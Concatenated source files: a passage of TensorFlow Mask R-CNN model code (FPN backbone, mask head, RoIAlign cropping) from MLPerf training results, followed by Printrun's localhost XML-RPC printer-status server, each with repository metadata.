    # TODO(chiachenc): check what is MSRAFill initialization in the reference.
    # Four 3x3 convs with MSRAFill-equivalent init; the init parameters are
    # identical for all four layers, so compute the stddev once.
    kernel_size = (3, 3)
    fan_out = 256
    init_stddev = _get_stddev_equivalent_to_msra_fill(kernel_size, fan_out)
    for i in range(4):
      net = tf.layers.conv2d(
          net,
          fan_out,
          kernel_size=kernel_size,
          strides=(1, 1),
          padding='same',
          dilation_rate=(1, 1),
          activation=tf.nn.relu,
          kernel_initializer=tf.random_normal_initializer(stddev=init_stddev),
          bias_initializer=tf.zeros_initializer(),
          name='mask-conv-l%d' % i)
    # Stride-2 deconv doubles the spatial resolution (14 -> 28).
    kernel_size = (2, 2)
    fan_out = 256
    init_stddev = _get_stddev_equivalent_to_msra_fill(kernel_size, fan_out)
    net = tf.layers.conv2d_transpose(
        net,
        fan_out,
        kernel_size=kernel_size,
        strides=(2, 2),
        padding='valid',
        activation=tf.nn.relu,
        kernel_initializer=tf.random_normal_initializer(stddev=init_stddev),
        bias_initializer=tf.zeros_initializer(),
        name='conv5-mask')
    # Final 1x1 conv emits one mask logit map per class.
    kernel_size = (1, 1)
    fan_out = num_classes
    init_stddev = _get_stddev_equivalent_to_msra_fill(kernel_size, fan_out)
    mask_outputs = tf.layers.conv2d(
        net,
        fan_out,
        kernel_size=kernel_size,
        strides=(1, 1),
        padding='valid',
        kernel_initializer=tf.random_normal_initializer(stddev=init_stddev),
        bias_initializer=tf.zeros_initializer(),
        name='mask_fcn_logits')
    mask_outputs = tf.reshape(
        mask_outputs,
        [batch_size, num_masks, mrcnn_resolution, mrcnn_resolution, -1])
    return mask_outputs
def select_fg_for_masks(class_targets, box_targets, boxes,
                        proposal_to_label_map, max_num_fg=128):
  """Selects the foreground objects for the mask branch during training.

  Args:
    class_targets: a tensor of shape [batch_size, num_boxes] representing the
      class label for each box.
    box_targets: a tensor with a shape of [batch_size, num_boxes, 4]. The
      tensor contains the ground truth pixel coordinates of the scaled images
      for each roi.
    boxes: A 3-D Tensor of shape [batch_size, num_boxes, 4]. Each row
      represents a box with [y1, x1, y2, x2] in un-normalized coordinates.
    proposal_to_label_map: a tensor with a shape of [batch_size, num_boxes].
      This tensor keeps the mapping between proposal to labels.
      proposal_to_label_map[i] means the index of the ground truth instance
      for the i-th proposal.
    max_num_fg: an integer representing the number of masks per image.

  Returns:
    class_targets, boxes, proposal_to_label_map, box_targets that have
    foreground objects.
  """
  with tf.name_scope('select_fg_for_masks'):
    # Masks are for positive (fg) objects only. Reference: https://github.com/facebookresearch/Detectron/blob/master/detectron/roi_data/mask_rcnn.py # pylint: disable=line-too-long
    batch_size = boxes.shape[0]
    # Foreground proposals have class > 0; top_k on the 0/1 indicator picks
    # (up to) max_num_fg foreground row indices per batch element.
    fg_mask = tf.to_float(tf.greater(class_targets, 0))
    _, fg_indices = tf.nn.top_k(fg_mask, k=max_num_fg)
    # Flatten batch-relative indices into row indices of the flattened
    # [batch_size * num_boxes, ...] tensors so one gather suffices each.
    row_offsets = tf.expand_dims(
        tf.range(batch_size) * tf.shape(class_targets)[1], 1)
    flat_indices = tf.reshape(fg_indices + row_offsets, [-1])

    def _take(tensor, width, out_shape):
      """Gathers the selected foreground rows and restores the batch shape."""
      flat = tf.reshape(tensor, [-1, width])
      return tf.reshape(tf.gather(flat, flat_indices), out_shape)

    fg_class_targets = _take(class_targets, 1, [batch_size, -1])
    fg_box_targets = _take(box_targets, 4, [batch_size, -1, 4])
    fg_box_rois = _take(boxes, 4, [batch_size, -1, 4])
    fg_proposal_to_label_map = _take(
        proposal_to_label_map, 1, [batch_size, -1])
    return (fg_class_targets, fg_box_targets, fg_box_rois,
            fg_proposal_to_label_map)
def resnet_fpn(features,
               min_level=3,
               max_level=7,  # pylint: disable=unused-argument
               resnet_depth=50,
               is_training_bn=False):
  """ResNet feature pyramid networks."""
  # Bottom-up pathway: the ResNet backbone yields levels 2 through 5.
  with tf.variable_scope('resnet%s' % resnet_depth):
    resnet_fn = resnet_v1(resnet_depth)
    bottom_up = dict(zip((2, 3, 4, 5), resnet_fn(features, is_training_bn)))
  with tf.variable_scope('resnet_fpn'):
    # 1x1 lateral connections project every level to 256 channels.
    laterals = {}
    for level in range(min_level, _RESNET_MAX_LEVEL + 1):
      laterals[level] = tf.layers.conv2d(
          bottom_up[level],
          filters=256,
          kernel_size=(1, 1),
          padding='same',
          name='l%d' % level)
    # Top-down pathway: upsample the coarser map and add the lateral.
    feats = {_RESNET_MAX_LEVEL: laterals[_RESNET_MAX_LEVEL]}
    for level in range(_RESNET_MAX_LEVEL - 1, min_level - 1, -1):
      feats[level] = nearest_upsampling(
          feats[level + 1], 2) + laterals[level]
    # Post-hoc 3x3 convolution on each merged map.
    for level in range(min_level, _RESNET_MAX_LEVEL + 1):
      feats[level] = tf.layers.conv2d(
          feats[level],
          filters=256,
          strides=(1, 1),
          kernel_size=(3, 3),
          padding='same',
          name='post_hoc_d%d' % level)
    # Use original FPN P6 level implementation from CVPR'17 FPN paper instead
    # of coarse FPN levels introduced for RetinaNet.
    # Reference: https://github.com/ddkang/Detectron/blob/80f329530843e66d07ca39e19901d5f3e5daf009/lib/modeling/FPN.py # pylint: disable=line-too-long
    feats[6] = tf.layers.max_pooling2d(
        inputs=feats[5],
        pool_size=1,
        strides=2,
        padding='valid',
        name='p6')
  return feats
def mask_rcnn(features, labels, all_anchors, mode, params):
  """Mask-RCNN classification and regression model.

  Builds the FPN backbone and returns it together with three closures (RPN
  head, Fast-RCNN box/class head, mask head) that capture `mode`, `params`,
  `labels` and `all_anchors` from this scope.

  Args:
    features: input image tensor, passed directly to resnet_fpn.
    labels: a dictionary; 'image_info' is read by faster_rcnn_fn, and
      'groundtruth_data' / 'cropped_gt_masks' are read during training.
    all_anchors: an Anchors object covering all FPN levels.
    mode: a tf.estimator.ModeKeys value; selects train vs. test NMS top-k
      parameters and the mask head's training/inference path.
    params: a dictionary of model hyperparameters (see the keys read below).

  Returns:
    A tuple (fpn_feats, rpn_fn, faster_rcnn_fn, mask_rcnn_fn).
  """
  min_level = params['min_level']
  max_level = params['max_level']
  # create feature pyramid networks
  fpn_feats = resnet_fpn(features, min_level, max_level, params['resnet_depth'],
                         params['is_training_bn'])

  def rpn_fn(feats):
    # NOTE(review): `len(list * n)` equals `len(list) * n`, i.e. the
    # anchors-per-location count is len(aspect_ratios) * num_scales.
    rpn_score_outputs, rpn_box_outputs = rpn_net(
        feats, min_level, max_level,
        len(params['aspect_ratios'] * params['num_scales']))
    return rpn_score_outputs, rpn_box_outputs

  # Box and class part (Fast-RCNN).
  def faster_rcnn_fn(feats, rpn_score_outputs, rpn_box_outputs):
    """Generates box and class outputs."""
    # Uses different NMS top-k parameters in different modes.
    mlperf_log.maskrcnn_print(key=mlperf_log.RPN_PRE_NMS_TOP_N_TRAIN,
                              value=params['rpn_pre_nms_topn'])
    mlperf_log.maskrcnn_print(key=mlperf_log.RPN_PRE_NMS_TOP_N_TEST,
                              value=params['test_rpn_pre_nms_topn'])
    mlperf_log.maskrcnn_print(key=mlperf_log.RPN_POST_NMS_TOP_N_TRAIN,
                              value=params['rpn_post_nms_topn'])
    mlperf_log.maskrcnn_print(key=mlperf_log.RPN_POST_NMS_TOP_N_TEST,
                              value=params['test_rpn_post_nms_topn'])
    rpn_pre_nms_topn = (
        params['rpn_pre_nms_topn'] if mode == tf.estimator.ModeKeys.TRAIN else
        params['test_rpn_pre_nms_topn'])
    rpn_post_nms_topn = (
        params['rpn_post_nms_topn'] if mode == tf.estimator.ModeKeys.TRAIN else
        params['test_rpn_post_nms_topn'])
    # Generate RoIs from the RPN outputs; the proposal scores are discarded.
    _, box_rois = proposal_op(rpn_score_outputs, rpn_box_outputs, all_anchors,
                              labels['image_info'], rpn_pre_nms_topn,
                              rpn_post_nms_topn, params['rpn_nms_threshold'],
                              params['rpn_min_size'])
    box_rois = tf.to_float(box_rois)
    mlperf_log.maskrcnn_print(key=mlperf_log.FG_IOU_THRESHOLD,
                              value=params['fg_thresh'])
    mlperf_log.maskrcnn_print(key=mlperf_log.BG_IOU_THRESHOLD,
                              value=params['bg_thresh_hi'])
    # Sample RoIs and assign targets; groundtruth_data columns 0:4 are passed
    # as boxes and column 6 as class labels (per proposal_label_op's inputs).
    (box_targets, class_targets, box_rois,
     proposal_to_label_map) = proposal_label_op(
         box_rois, labels['groundtruth_data'][:, :, :4],
         labels['groundtruth_data'][:, :, 6], labels['image_info'],
         batch_size_per_im=params['batch_size_per_im'],
         fg_fraction=params['fg_fraction'], fg_thresh=params['fg_thresh'],
         bg_thresh_hi=params['bg_thresh_hi'],
         bg_thresh_lo=params['bg_thresh_lo'],
         is_training=(mode == tf.estimator.ModeKeys.TRAIN))
    class_outputs, box_outputs = faster_rcnn_heads(
        feats, box_rois, num_classes=params['num_classes'],
        mlp_head_dim=params['fast_rcnn_mlp_head_dim'])
    return (class_outputs, box_outputs, class_targets, box_targets, box_rois,
            proposal_to_label_map)

  # Mask part (Mask-RCNN).
  def mask_rcnn_fn(feats, class_targets=None, box_targets=None, box_rois=None,
                   proposal_to_label_map=None, detections=None):
    """Generates mask outputs (and mask targets during training)."""
    if mode == tf.estimator.ModeKeys.TRAIN:
      # Masks are computed only for foreground RoIs during training.
      (class_targets, box_targets, box_rois,
       proposal_to_label_map) = select_fg_for_masks(
           class_targets, box_targets, box_rois, proposal_to_label_map,
           max_num_fg=int(params['batch_size_per_im'] * params['fg_fraction']))
      mask_targets = get_mask_targets(
          box_rois, proposal_to_label_map, box_targets,
          labels['cropped_gt_masks'], params['mrcnn_resolution'])
      mask_outputs = mask_rcnn_heads(
          feats, box_rois, num_classes=params['num_classes'],
          mrcnn_resolution=params['mrcnn_resolution'])
      return (mask_outputs, class_targets, box_targets, box_rois,
              proposal_to_label_map, mask_targets)
    else:
      # At inference time the RoIs come from the detection results; columns
      # 1:5 of `detections` are used as the box coordinates.
      box_rois = detections[:, :, 1:5]
      mask_outputs = mask_rcnn_heads(
          feats, box_rois, num_classes=params['num_classes'],
          mrcnn_resolution=params['mrcnn_resolution'])
      return mask_outputs

  return fpn_feats, rpn_fn, faster_rcnn_fn, mask_rcnn_fn
def remove_variables(variables, resnet_depth=50):
  """Removes low-level variables from the input.

  Removing low-level parameters (e.g., initial convolution layer) from
  training usually leads to higher training speed and slightly better testing
  accuracy. The intuition is that the low-level architecture
  (e.g., ResNet-50) is able to capture low-level features such as edges;
  therefore, it does not need to be fine-tuned for the detection task.

  Args:
    variables: all the variables in training
    resnet_depth: the depth of ResNet model

  Returns:
    var_list: a list containing variables for training
  """
  # Freeze at conv2 based on reference model.
  # Reference: https://github.com/ddkang/Detectron/blob/80f329530843e66d07ca39e19901d5f3e5daf009/lib/modeling/ResNet.py # pylint: disable=line-too-long
  prefix = 'resnet{}/'.format(resnet_depth)
  # The frozen layers are conv2d / batch_normalization plus their
  # '_1' .. '_10' suffixed siblings.
  suffixes = [''] + ['_{}'.format(i) for i in range(1, 11)]
  frozen_markers = [prefix + layer + suffix + '/'
                    for suffix in suffixes
                    for layer in ('conv2d', 'batch_normalization')]
  return [v for v in variables
          if not any(marker in v.name for marker in frozen_markers)]
def get_mask_targets(fg_boxes, fg_proposal_to_label_map, fg_box_targets,
                     mask_gt_labels, output_size=28):
  """Crops and resizes ground truth instance masks into per-RoI mask targets.

  Each foreground RoI is mapped onto its matching ground truth mask (via
  fg_proposal_to_label_map) and a bilinear crop of that mask is taken over
  the RoI's extent, then thresholded to a binary target.

  Args:
    fg_boxes: A 3-D tensor of shape [batch_size, num_masks, 4]. Each row
      represents a box with [y1, x1, y2, x2] in un-normalized coordinates.
    fg_proposal_to_label_map: A tensor of shape [batch_size, num_masks].
    fg_box_targets: a float tensor representing the box label for each box
      with a shape of [batch_size, num_masks, 4].
    mask_gt_labels: A tensor with a shape of [batch_size, M, H+4, W+4]. M is
      NUM_MAX_INSTANCES (i.e., 100 in this implementation) in each image,
      while H and W are ground truth mask size. The `+4` comes from padding
      of two zeros in both directions of height and width dimension.
    output_size: A scalar to indicate the output crop size.

  Returns:
    A 4-D tensor representing feature crop of shape
    [batch_size, num_boxes, output_size, output_size].
  """
  # TODO(chiachenc): this function is embarrassingly similar to
  # `multilevel_crop_and_resize`. Two functions shall be refactored.
  with tf.name_scope('get_mask_targets'):
    (batch_size, num_instances, max_feature_height,
     max_feature_width) = mask_gt_labels.get_shape().as_list()
    _, num_masks = fg_proposal_to_label_map.get_shape().as_list()
    features_all = mask_gt_labels
    # Strides for flattening [batch, instance, height, width] into the 1-D
    # index space used by the single tf.gather below.
    height_dim_size = max_feature_width
    level_dim_size = max_feature_height * height_dim_size
    batch_dim_size = num_instances * level_dim_size
    # proposal_to_label_map might have -1 paddings.
    levels = tf.maximum(fg_proposal_to_label_map, 0)
    # Projects box location and sizes to corresponding cropped ground truth
    # mask coordinates.
    bb_y_min, bb_x_min, bb_y_max, bb_x_max = tf.split(
        value=fg_boxes, num_or_size_splits=4, axis=2)
    gt_y_min, gt_x_min, gt_y_max, gt_x_max = tf.split(
        value=fg_box_targets, num_or_size_splits=4, axis=2)
    # The stored masks carry a 2-pixel zero border on every side (the `+4`
    # padding), hence the `- 4` here and the `+ 2` offsets below.
    valid_feature_width = max_feature_width - 4
    valid_feature_height = max_feature_height - 4
    y_transform = (bb_y_min - gt_y_min) * valid_feature_height / (
        gt_y_max - gt_y_min + _EPSILON) + 2
    x_transform = (bb_x_min - gt_x_min) * valid_feature_width / (
        gt_x_max - gt_x_min + _EPSILON) + 2
    h_transform = (bb_y_max - bb_y_min) * valid_feature_height / (
        gt_y_max - gt_y_min + _EPSILON)
    w_transform = (bb_x_max - bb_x_min) * valid_feature_width / (
        gt_x_max - gt_x_min + _EPSILON)
    # Compute y and x coordinate indices: output_size sample points per axis,
    # placed at the centers of equal-width sub-bins of the box.
    box_grid_x = []
    box_grid_y = []
    for i in range(output_size):
      box_grid_x.append(x_transform + (0.5 + i) * w_transform / output_size)
      box_grid_y.append(y_transform + (0.5 + i) * h_transform / output_size)
    box_grid_x = tf.stack(box_grid_x, axis=2)
    box_grid_y = tf.stack(box_grid_y, axis=2)
    box_grid_y0 = tf.floor(box_grid_y)
    box_grid_x0 = tf.floor(box_grid_x)
    # Compute indices for gather operation: each sample point reads its two
    # nearest integer coordinates per axis for bilinear interpolation.
    box_gridx0x1 = tf.stack([box_grid_x0, box_grid_x0 + 1], axis=3)
    box_gridy0y1 = tf.stack([box_grid_y0, box_grid_y0 + 1], axis=3)
    # Check boundary.
    box_gridx0x1 = tf.minimum(
        tf.to_float(max_feature_width-1), tf.maximum(0., box_gridx0x1))
    box_gridy0y1 = tf.minimum(
        tf.to_float(max_feature_height-1), tf.maximum(0., box_gridy0y1))
    x_indices = tf.cast(
        tf.reshape(box_gridx0x1,
                   [batch_size, num_masks, output_size * 2]), dtype=tf.int32)
    y_indices = tf.cast(
        tf.reshape(box_gridy0y1,
                   [batch_size, num_masks, output_size * 2]), dtype=tf.int32)
    # Flat gather indices: batch offset + instance offset + y * row + x,
    # broadcast via tf.tile to the full sampling grid.
    indices = tf.reshape(
        tf.tile(tf.reshape(tf.range(batch_size) * batch_dim_size,
                           [batch_size, 1, 1, 1]),
                [1, num_masks, output_size * 2, output_size * 2]) +
        tf.tile(tf.reshape(levels * level_dim_size,
                           [batch_size, num_masks, 1, 1]),
                [1, 1, output_size * 2, output_size * 2]) +
        tf.tile(tf.reshape(y_indices * height_dim_size,
                           [batch_size, num_masks, output_size * 2, 1]),
                [1, 1, 1, output_size * 2]) +
        tf.tile(tf.reshape(x_indices,
                           [batch_size, num_masks, 1, output_size * 2]),
                [1, 1, output_size * 2, 1]), [-1])
    features_r2 = tf.reshape(features_all, [-1, 1])
    features_per_box = tf.reshape(
        tf.gather(features_r2, indices),
        [batch_size, num_masks, output_size * 2, output_size * 2])
    # The RoIAlign feature f can be computed by bilinear interpolation of four
    # neighboring feature points f0, f1, f2, and f3.
    # f(y, x) = [hy, ly] * [[f00, f01], * [hx, lx]^T
    #                       [f10, f11]]
    # f(y, x) = (hy*hx)f00 + (hy*lx)f01 + (ly*hx)f10 + (lx*ly)f11
    # f(y, x) = w00*f00 + w01*f01 + w10*f10 + w11*f11
    ly = box_grid_y - box_grid_y0
    lx = box_grid_x - box_grid_x0
    hy = 1.0 - ly
    hx = 1.0 - lx
    kernel_x = tf.reshape(tf.stack([hx, lx], axis=3),
                          [batch_size, num_masks, 1, output_size*2])
    kernel_y = tf.reshape(tf.stack([hy, ly], axis=3),
                          [batch_size, num_masks, output_size*2, 1])
    # Use implicit broadcast to generate the interpolation kernel. The
    # multiplier `4` is for avg pooling.
    interpolation_kernel = kernel_y * kernel_x * 4
    # Interpolate the gathered features with computed interpolation kernels.
    features_per_box *= tf.cast(interpolation_kernel,
                                dtype=features_per_box.dtype)
    # 2x2 average pooling (applied in NHWC via the surrounding transposes)
    # folds the four weighted neighbors of each sample point into one value.
    features_per_box = tf.transpose(features_per_box, perm=[0, 2, 3, 1])
    features_per_box = tf.nn.avg_pool(
        features_per_box, [1, 2, 2, 1], [1, 2, 2, 1], 'VALID')
    features_per_box = tf.transpose(features_per_box, perm=[0, 3, 1, 2])
    # Masks are binary outputs.
    features_per_box = tf.where(
        tf.greater_equal(features_per_box, 0.5), tf.ones_like(features_per_box),
        tf.zeros_like(features_per_box))
    # mask_targets depend on box RoIs, which have gradients. This stop_gradient
    # prevents the flow of gradient to box RoIs.
    features_per_box = tf.stop_gradient(features_per_box)
  return features_per_box
def multilevel_crop_and_resize(features, boxes, output_size=7):
  """Crop and resize on multilevel feature pyramid.

  Following the ROIAlign technique (see https://arxiv.org/pdf/1703.06870.pdf,
  figure 3 for reference), we want to sample pixel level feature information
  from our feature map at the box boundaries. For each feature map, we select
  an (output_size, output_size) set of pixels corresponding to our box
  location, and then use bilinear interpolation to select the feature value
  for each pixel.

  For performance, we perform the gather and interpolation on all layers as a
  single operation. To do this, the multi-level features are first stacked and
  gathered into [2*output_size, 2*output_size] feature points. Then bilinear
  interpolation is performed on the gathered feature points to generate
  [output_size, output_size] RoIAlign feature map.

  Here is the step-by-step algorithm:
    1. Pad all multi-level features to a fixed spatial dimension and stack them
       into a Tensor of shape [batch_size, level, height, width, num_filters].
    2. The multi-level features are then gathered into a
       [batch_size, num_boxes, output_size*2, output_size*2, num_filters]
       Tensor. The Tensor contains four neighboring feature points for each
       vertex in the output grid.
       Instead of performing gather operation in one-step, a two-step gather
       algorithm is performed. First, the Tensor containing multi-level
       features is gathered into
       [batch_size, num_boxes, output_size*2, width, num_filters].
       Then the tensor is transposed to
       [batch_size, num_boxes, width, output_size*2, num_filters]
       then gathered to
       [batch_size, num_boxes, output_size*2, output_size*2, num_filters].
       The 2-step gather algorithm makes sure each gather operation performs
       on large contiguous memory.
    3. Compute the interpolation kernel of shape
       [batch_size, num_boxes, output_size*2, output_size*2]. The last 2 axes
       can be seen as stacking 2x2 interpolation kernels for all vertices in
       the output grid.
    4. Element-wise multiply the gathered features and interpolation kernel.
       Then apply 2x2 average pooling to reduce spatial dimension to
       output_size.

  Args:
    features: A dictionary with key as pyramid level and value as features.
      The features are in shape of [batch_size, height_l, width_l, num_filters].
    boxes: A 3-D Tensor of shape [batch_size, num_boxes, 4]. Each row
      represents a box with [y1, x1, y2, x2] in un-normalized coordinates.
    output_size: A scalar to indicate the output crop size.

  Returns:
    A 5-D tensor representing feature crop of shape
    [batch_size, num_boxes, output_size, output_size, num_filters].
  """
  with tf.name_scope('multilevel_crop_and_resize'):
    levels = features.keys()
    min_level = min(levels)
    max_level = max(levels)
    # All levels are zero-padded to the spatial extent of the finest level.
    (batch_size, max_feature_height,
     max_feature_width, num_filters) = features[min_level].get_shape().as_list()
    _, num_boxes, _ = boxes.get_shape().as_list()
    # Stack feature pyramid into a features_all of shape
    # [batch_size, levels, height, width, num_filters].
    features_all = []
    for level in range(min_level, max_level + 1):
      features_all.append(tf.image.pad_to_bounding_box(
          features[level], 0, 0, max_feature_height, max_feature_width))
    features_all = tf.stack(features_all, axis=1)
    # Strides used below to linearize [batch, level, y, x] into a flat index.
    height_dim_size = max_feature_width
    level_dim_size = max_feature_height * height_dim_size
    batch_dim_size = len(levels) * level_dim_size
    # Assign boxes to the right level (FPN heuristic with the canonical
    # 224 pretraining size).
    box_width = boxes[:, :, 3] - boxes[:, :, 1]
    box_height = boxes[:, :, 2] - boxes[:, :, 0]
    areas_sqrt = tf.sqrt(box_height * box_width)
    levels = tf.cast(tf.floordiv(tf.log(tf.div(areas_sqrt, 224.0)),
                                 tf.log(2.0)) + 4.0, dtype=tf.int32)
    # Map levels between [min_level, max_level].
    levels = tf.minimum(max_level, tf.maximum(levels, min_level))
    # Project box location and sizes to corresponding feature levels.
    scale_to_level = tf.cast(
        tf.pow(tf.constant(2.0), tf.cast(levels, tf.float32)),
        dtype=boxes.dtype)
    boxes /= tf.expand_dims(scale_to_level, axis=2)
    box_width /= scale_to_level
    box_height /= scale_to_level
    # Map levels to [0, max_level-min_level].
    levels -= min_level
    # Compute y and x coordinates at the sub-pixel bin centers.
    box_grid_x = []
    box_grid_y = []
    for i in range(output_size):
      box_grid_x.append(boxes[:, :, 1] + (i + 0.5) * box_width / output_size)
      box_grid_y.append(boxes[:, :, 0] + (i + 0.5) * box_height / output_size)
    box_grid_x = tf.stack(box_grid_x, axis=2)
    box_grid_y = tf.stack(box_grid_y, axis=2)
    box_grid_y0 = tf.floor(box_grid_y)
    box_grid_x0 = tf.floor(box_grid_x)
    # Compute indices for gather operation, clipped to the valid extent of
    # each box's assigned level.
    # NOTE(fix): the y boundary is derived from the feature height; the
    # original code reused max_feature_width for both axes, which mis-clips
    # y indices whenever the feature maps are non-square. Behavior is
    # unchanged for square feature maps.
    box_grid_x0 = tf.maximum(0., box_grid_x0)
    box_grid_y0 = tf.maximum(0., box_grid_y0)
    level_scale = tf.pow([[2.0]], tf.cast(levels, tf.float32))
    boundary_x = tf.cast(
        tf.expand_dims(
            [[tf.cast(max_feature_width, tf.float32)]] / level_scale - 1, 2),
        box_grid_x0.dtype)
    boundary_y = tf.cast(
        tf.expand_dims(
            [[tf.cast(max_feature_height, tf.float32)]] / level_scale - 1, 2),
        box_grid_y0.dtype)
    box_gridx0x1 = tf.stack([
        tf.minimum(box_grid_x0, boundary_x),
        tf.minimum(box_grid_x0 + 1, boundary_x)
    ],
                            axis=3)
    box_gridy0y1 = tf.stack([
        tf.minimum(box_grid_y0, boundary_y),
        tf.minimum(box_grid_y0 + 1, boundary_y)
    ],
                            axis=3)
    x_indices = tf.cast(
        tf.reshape(box_gridx0x1,
                   [batch_size, num_boxes, output_size * 2]), dtype=tf.int32)
    y_indices = tf.cast(
        tf.reshape(box_gridy0y1,
                   [batch_size, num_boxes, output_size * 2]), dtype=tf.int32)
    # Linearize [batch, level, y, x] coordinates into flat indices into the
    # row-major flattened pyramid (features_r2).
    indices = tf.reshape(
        tf.tile(tf.reshape(tf.range(batch_size) * batch_dim_size,
                           [batch_size, 1, 1, 1]),
                [1, num_boxes, output_size * 2, output_size * 2]) +
        tf.tile(tf.reshape(levels * level_dim_size,
                           [batch_size, num_boxes, 1, 1]),
                [1, 1, output_size * 2, output_size * 2]) +
        tf.tile(tf.reshape(y_indices * height_dim_size,
                           [batch_size, num_boxes, output_size * 2, 1]),
                [1, 1, 1, output_size * 2]) +
        tf.tile(tf.reshape(x_indices,
                           [batch_size, num_boxes, 1, output_size * 2]),
                [1, 1, output_size * 2, 1]), [-1])
    features_r2 = tf.reshape(features_all, [-1, num_filters])
    features_per_box = tf.reshape(
        tf.gather(features_r2, indices),
        [batch_size, num_boxes, output_size * 2, output_size * 2, num_filters])
    # The RoIAlign feature f can be computed by bilinear interpolation of four
    # neighboring feature points f0, f1, f2, and f3.
    # f(y, x) = [hy, ly] * [[f00, f01], * [hx, lx]^T
    #                       [f10, f11]]
    # f(y, x) = (hy*hx)f00 + (hy*lx)f01 + (ly*hx)f10 + (lx*ly)f11
    # f(y, x) = w00*f00 + w01*f01 + w10*f10 + w11*f11
    ly = box_grid_y - box_grid_y0
    lx = box_grid_x - box_grid_x0
    hy = 1.0 - ly
    hx = 1.0 - lx
    kernel_x = tf.reshape(tf.stack([hx, lx], axis=3),
                          [batch_size, num_boxes, 1, output_size*2])
    kernel_y = tf.reshape(tf.stack([hy, ly], axis=3),
                          [batch_size, num_boxes, output_size*2, 1])
    # Use implicit broadcast to generate the interpolation kernel. The
    # multiplier `4` undoes the division performed by 2x2 avg pooling below.
    interpolation_kernel = kernel_y * kernel_x * 4
    # Interpolate the gathered features with computed interpolation kernels.
    features_per_box *= tf.cast(
        tf.expand_dims(interpolation_kernel, axis=4),
        dtype=features_per_box.dtype)
    features_per_box = tf.reshape(
        features_per_box,
        [batch_size * num_boxes, output_size*2, output_size*2, num_filters])
    features_per_box = tf.nn.avg_pool(
        features_per_box, [1, 2, 2, 1], [1, 2, 2, 1], 'VALID')
    features_per_box = tf.reshape(
        features_per_box,
        [batch_size, num_boxes, output_size, output_size, num_filters])
  return features_per_box
| {
"content_hash": "53b4b96483140e516c6046dc6d571ffd",
"timestamp": "",
"source": "github",
"line_count": 1835,
"max_line_length": 181,
"avg_line_length": 42.23978201634878,
"alnum_prop": 0.6402399690362534,
"repo_name": "mlperf/training_results_v0.5",
"id": "02fe59ed78cd478b9d4e18a5649331f190a28502",
"size": "78199",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "v0.5.0/google/cloud_v2.8/gnmt-tpuv2-8/code/gnmt/model/staging/models/rough/mask_rcnn/mask_rcnn_architecture.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "5720"
},
{
"name": "C++",
"bytes": "1288180"
},
{
"name": "CMake",
"bytes": "40880"
},
{
"name": "CSS",
"bytes": "32420"
},
{
"name": "Cuda",
"bytes": "1362093"
},
{
"name": "Dockerfile",
"bytes": "19488"
},
{
"name": "Go",
"bytes": "1088660"
},
{
"name": "HTML",
"bytes": "19756888"
},
{
"name": "Java",
"bytes": "45405"
},
{
"name": "JavaScript",
"bytes": "302838"
},
{
"name": "Jupyter Notebook",
"bytes": "9104667"
},
{
"name": "Lua",
"bytes": "4430"
},
{
"name": "Makefile",
"bytes": "3652"
},
{
"name": "Python",
"bytes": "31508548"
},
{
"name": "Scala",
"bytes": "106211"
},
{
"name": "Shell",
"bytes": "409745"
}
],
"symlink_target": ""
} |
from SimpleXMLRPCServer import SimpleXMLRPCServer
from threading import Thread
import errno
import logging
import socket

from .utils import install_locale, parse_temperature_report
install_locale('pronterface')
RPC_PORT = 7978
class ProntRPC(object):
    """XML-RPC front-end exposing printer status over localhost.

    Binds a SimpleXMLRPCServer on `port` (probing upward when the port is
    already in use) and serves a single `status` method from a background
    thread.
    """

    # The bound SimpleXMLRPCServer instance (set in __init__).
    server = None

    def __init__(self, pronsole, port = RPC_PORT):
        self.pronsole = pronsole
        used_port = port
        while True:
            try:
                self.server = SimpleXMLRPCServer(("localhost", used_port),
                                                 allow_none = True,
                                                 logRequests = False)
                if used_port != port:
                    logging.warning(_("RPC server bound on non-default port %d") % used_port)
                break
            except socket.error as e:
                # Port taken: try the next one. errno.EADDRINUSE replaces
                # the original hard-coded `98`, which is Linux-specific.
                if e.errno == errno.EADDRINUSE:
                    used_port += 1
                    continue
                else:
                    raise
        self.server.register_function(self.get_status, 'status')
        self.thread = Thread(target = self.run_server)
        self.thread.start()

    def run_server(self):
        """Block serving RPC requests until shutdown() is called."""
        self.server.serve_forever()

    def shutdown(self):
        """Stop the server loop and join the worker thread."""
        self.server.shutdown()
        self.thread.join()

    def get_status(self):
        """Return a dict snapshot of the current print job status."""
        if self.pronsole.p.printing:
            progress = 100 * float(self.pronsole.p.queueindex) / len(self.pronsole.p.mainqueue)
        elif self.pronsole.sdprinting:
            # Fix: percentdone lives on the pronsole, not on this RPC
            # wrapper; the original `self.percentdone` raised
            # AttributeError whenever an SD-card print was in progress.
            progress = self.pronsole.percentdone
        else: progress = None
        if self.pronsole.p.printing or self.pronsole.sdprinting:
            eta = self.pronsole.get_eta()
        else:
            eta = None
        if self.pronsole.tempreadings:
            temps = parse_temperature_report(self.pronsole.tempreadings)
        else:
            temps = None
        z = self.pronsole.curlayer
        return {"filename": self.pronsole.filename,
                "progress": progress,
                "eta": eta,
                "temps": temps,
                "z": z,
                }
| {
"content_hash": "d47cb92caf636c0758d5d50a0cdfe279",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 95,
"avg_line_length": 32.42857142857143,
"alnum_prop": 0.5345080763582967,
"repo_name": "Autonomi/limn",
"id": "8bdd5aec560836c2e3d9ca2ef9c9121d96be4265",
"size": "2711",
"binary": false,
"copies": "17",
"ref": "refs/heads/master",
"path": "Printrun/printrun/rpc.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Arduino",
"bytes": "127219"
},
{
"name": "C",
"bytes": "16589807"
},
{
"name": "C++",
"bytes": "18789673"
},
{
"name": "CSS",
"bytes": "8345"
},
{
"name": "Eagle",
"bytes": "2655951"
},
{
"name": "HTML",
"bytes": "4387"
},
{
"name": "JavaScript",
"bytes": "95080"
},
{
"name": "Makefile",
"bytes": "77842"
},
{
"name": "Objective-C",
"bytes": "26332"
},
{
"name": "Perl",
"bytes": "320940"
},
{
"name": "Perl6",
"bytes": "12640"
},
{
"name": "PostScript",
"bytes": "68594"
},
{
"name": "Processing",
"bytes": "501066"
},
{
"name": "Prolog",
"bytes": "43"
},
{
"name": "Python",
"bytes": "660383"
},
{
"name": "Scilab",
"bytes": "10211"
},
{
"name": "Shell",
"bytes": "107651"
},
{
"name": "nesC",
"bytes": "984564"
}
],
"symlink_target": ""
} |
import uuid
